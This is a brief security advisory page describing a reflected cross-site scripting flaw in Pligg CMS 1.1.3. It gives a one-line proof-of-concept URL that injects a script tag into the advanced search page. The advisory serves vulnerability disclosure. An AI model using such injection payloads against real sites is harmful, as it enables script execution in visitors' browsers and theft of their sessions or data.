Home
Consulting
Advisories
Software
Articles
Contact

Pligg CMS 1.1.3 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in Pligg CMS 1.1.3 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/pligg/advancedsearch.php?search=%3C/title%3E%3Cscript%3Ealert(0)%3C/script%3E


Copyright © 2018 AutoSec Tools LLC